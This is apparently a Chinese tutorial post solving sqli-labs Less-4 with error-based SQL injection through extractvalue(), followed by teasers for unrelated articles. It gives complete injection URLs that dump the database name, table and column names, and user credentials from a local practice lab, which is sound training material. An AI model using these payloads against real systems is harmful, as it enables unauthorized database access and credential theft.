sqli-labs(Less-4) extractvalue闯关

news2024/10/7 18:30:31

extractvalue() - Xpath类型函数

1. 确认注入点如何闭合的方式
在这里插入图片描述

2. 爆出当前数据库的库名

http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select database()))) --+

在这里插入图片描述
3. 爆出当前数据库的表名

http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select table_name from information_schema.tables where table_schema=database() limit 0,1))) --+

注意:报错注入不能使用group_concat()函数直接将所有信息获取出来,只能一条一条获取,而且必须使用limit 0,1控制
在这里插入图片描述
通过不断调整limit 0,1 得到users表
在这里插入图片描述
4. 爆出表中的字段名

http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))) --+

在这里插入图片描述
通过不断调整limit 0,1 得到所有的字段名id,username,password

5. 获取表中内容

http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select concat(id,username,password) from users limit 0,1))) --+

在这里插入图片描述
可在concat中添加分隔符 更方便数据的获取

http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select concat(id,'~',username,'~',password) from users limit 0,1))) --+

在这里插入图片描述
通过不断调整limit 0,1 即可得到全部的账号密码

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1211454.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Java map 详解 - 用法、遍历、排序、常用API等

Java map 详解 - 用法、遍历、排序、常用API等

概要: java.util 中的集合类包含 Java 中某些最常用的类。最常用的集合类是 List 和 Map。 Map 提供了一个更通用的元素存储方法。Map 集合类用于存储元素对(称作“键”和“值”),其中每个键映射到一个值。 本文主要介绍java m…
阅读更多...
金融行业如何数字化转型?_光点科技

金融行业如何数字化转型?_光点科技

金融行业的数字化转型涉及技术创新的引入、客户体验的改善、内部流程的优化、安全和合规性的加强以及员工技能和企业文化的转变。 技术创新 包括云计算、人工智能、大数据分析和区块链技术的采用。云计算增强数据处理的灵活性,AI和机器学习在风险评估和欺诈检测方面…
阅读更多...
【技术分享】配置二层远程端口镜像案例

【技术分享】配置二层远程端口镜像案例

热门IT课程-CSDN博客文章浏览阅读24次。认证课程介绍:华为HCIA试听课程 : 华为HCIA试听课程:华为HCIA试听课程:华为HCIP试听课程:思科CCNA试听课程:思科CCNA试听课程:思科CCNA试听课程&#xff…
阅读更多...
Arduino安装 esp32 by Espressif (2.0.11)

Arduino安装 esp32 by Espressif (2.0.11)

安装Arduino IDE 2.2.1 Arduino 中安装 esp32 by Espressif (2.0.11) Arduino 中安装 DS1302 库文件 2022年安装的Arduino是1.8.10版本的,主控芯片是外置 2MB Flash 的 ESP32-C3芯片。ESP-C3-12F-2M。 202206 Arduino软件的安装、配置与程序下载的全过程演示 2023…
阅读更多...
plsql查询中文出现乱码

plsql查询中文出现乱码

添加环境变量:如下 变量名:NLS_LANG 变量值:SIMPLIFIED CHINESE_CHINA.ZHS16GBK 变量名:TNS_ADMIN 变量值:D:\instantclient_11_2\network\admin 在Path中添加instantclient_11_2存放路径
阅读更多...
TOUGH系列软件教程

TOUGH系列软件教程

查看原文>>>全流程TOUGH系列软件实践技术应用 TOUGH系列软件是由美国劳伦斯伯克利实验室开发的,旨在解决非饱和带中地下水、热运移的通用模拟软件。和传统地下水模拟软件Feflow和Modflow不同,TOUGH系列软件采用模块化设计和有限积分差网格剖分…
阅读更多...
notpad++正则化,利用关键字符删除整行

notpad++正则化,利用关键字符删除整行

首先,ctrlf,选中[替换],勾选正则表达式(可以勾选[匹配大小写],不用勾选[匹配新行])。在[查找目标]框输入[^(.*)"car_no_clean"(.*)$\n]。在$后加上\n,可以将被替换的行直接删除,不加则…
阅读更多...
【广州华锐互动】AR技术为气象站远程监控及在线指导维修提供极大便利

【广州华锐互动】AR技术为气象站远程监控及在线指导维修提供极大便利

随着科技的不断发展,人类对于自然环境的理解和掌控能力也在不断提升。其中,AR(增强现实)技术的应用,为气象监控带来了革命性的变化。AR远程气象监测,就是将AR技术与气象监控相结合,通过虚拟与现…
阅读更多...
vue中通过.style.animationDuration属性,根据数据长度动态设定元素的纵向滚动时长的demo

vue中通过.style.animationDuration属性,根据数据长度动态设定元素的纵向滚动时长的demo

根据数据长度动态设定元素的animation 先看看效果,是一个纯原生div标签加上css实现的表格纵向滚动动画: 目录 根据数据长度动态设定元素的animationHTMLjs逻辑1、判断是数据长度是否达到滚动要求2、根据数据长度设置滚动速度 Demo完整代码 HTML 1、确…
阅读更多...
校园信息发布平台小程序的作用是什么

校园信息发布平台小程序的作用是什么

校园墙是校内信息传播的一种渠道,有专门的人添加校内学生、教师,谁有信息发布需求即可联系让其通过QQ、微信朋友圈、社群等形式发布,多年来,学生们习惯了这类方式。 但这种方式并不高效,缺乏信息的真实性以及便捷性&a…
阅读更多...
Loguru:Python中强大的日志库

Loguru:Python中强大的日志库

目录 一、Loguru的安装 二、Loguru的使用 2.1 日志级别的设置 2.2 日志的输出格式 2.3 日志轮转与压缩 2.4 日志的彩色输出 2.5 在生产环境中使用Loguru 2.6 日志的过滤和搜索 2.7 日志的自定义格式化 2.8 日志的上下文信息 2.9 日志的异步处理 2.10 日志的搜索和筛…
阅读更多...
PSP - 蛋白质复合物结构预测 Template 的 Multichain Mask 2D (二维多链掩码)

PSP - 蛋白质复合物结构预测 Template 的 Multichain Mask 2D (二维多链掩码)

欢迎关注我的CSDN:https://spike.blog.csdn.net/ 本文地址:https://spike.blog.csdn.net/article/details/134406459 在 蛋白质复合物结构预测 中,AlphaFold2 Multimer 的 Multichain Mask 2D 对于 模版特征 (Template) 的影响较大&#xff0…
阅读更多...
【Python】逆向与爬虫的故事

【Python】逆向与爬虫的故事

目录 一、前言 二、爬虫 1、什么是爬虫? 2、Python 爬虫的主要工具 3、爬虫的基本流程 4、实例代码 三、逆向 1、什么是逆向? 2、Python 逆向的主要工具 3、逆向的基本流程 4、实例代码 四、总结 一、前言 随着互联网技术的发展&#xff0c…
阅读更多...
申明式管理方式与配置清单文件

申明式管理方式与配置清单文件

目录 申明式管理方式 1、使用申明式管理方式相关操作 1)获取资源配置清单 2)更改获取的yaml配置清单,并进行修改然后创建或更新资源 3)在线修改或编辑资源配置 4)删除资源 2、如何获取资源配置清单文件模板&…
阅读更多...
3D建模基础教程:编辑样条线【总层级】

3D建模基础教程:编辑样条线【总层级】

在本期的3D建模基础教程中,我们将探讨“编辑样条线”的【总层级】。我们将从以下几个方面进行深入分析: 1️⃣ 理解“编辑样条线”的层级结构 在3D建模中,“编辑样条线”是一个非常重要的环节。它主要涉及到曲线的创建、修改和调整。通过学习…
阅读更多...
【算法练习Day49】每日温度下一个更大元素 I

【算法练习Day49】每日温度下一个更大元素 I

​📝个人主页:Sherry的成长之路 🏠学习社区:Sherry的成长之路(个人社区) 📖专栏链接:练题 🎯长路漫漫浩浩,万事皆有期待 文章目录 每日温度下一个更大元素 I总…
阅读更多...
微信公众号预约挂号怎么做

微信公众号预约挂号怎么做

一、引言 在当今快节奏的生活中,时间是非常宝贵的。为了方便患者快速、准确地预约挂号,微信公众号已经推出了预约挂号功能。通过公众号预约挂号,你可以轻松地安排自己的就诊时间,避免了长时间排队和等待的烦恼。本文将为你详细介…
阅读更多...
第一型曲面积分的第二型曲面积分的区别与联系【从几何知识的角度思考】

第一型曲面积分的第二型曲面积分的区别与联系【从几何知识的角度思考】

此处为曲线积分------>【问题思考总结】第一型曲线积分和第二型曲线积分的区别与联系【从几何知识的角度思考】 一二型曲面积分有什么区别?(了解) 一型曲面积分: 由dS进行表示。可以想像,dS是一个面积微元&#x…
阅读更多...
gmpy2 GMP is_prime函数底层c代码分析

gmpy2 GMP is_prime函数底层c代码分析

偶然看到一篇paper(2018年发表),说GMP中的素性检测使用的是单独的Miller_Rabin方法,单独的Miller_Rabin素性检测会存在部分安全问题(低概率),然后突然想求证一下最新版本的GMP中是否进行了修改。…
阅读更多...
ComfyUI搭建

ComfyUI搭建

最近心血来潮想搞下 sd 的东西, 正好赶上腾讯云有活动, 附上个活动链接,有兴趣的小伙伴可以参考下,不用谢我 高性能应用服务HAI 新品内测 一 搭建 首先先选择一个框架, 我想搭建的是 comfyui, 所以选择了Pytorch2.0.0, 里面环境都适配好了 等待个 5-8 分钟就可以了 ,因为需要加…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023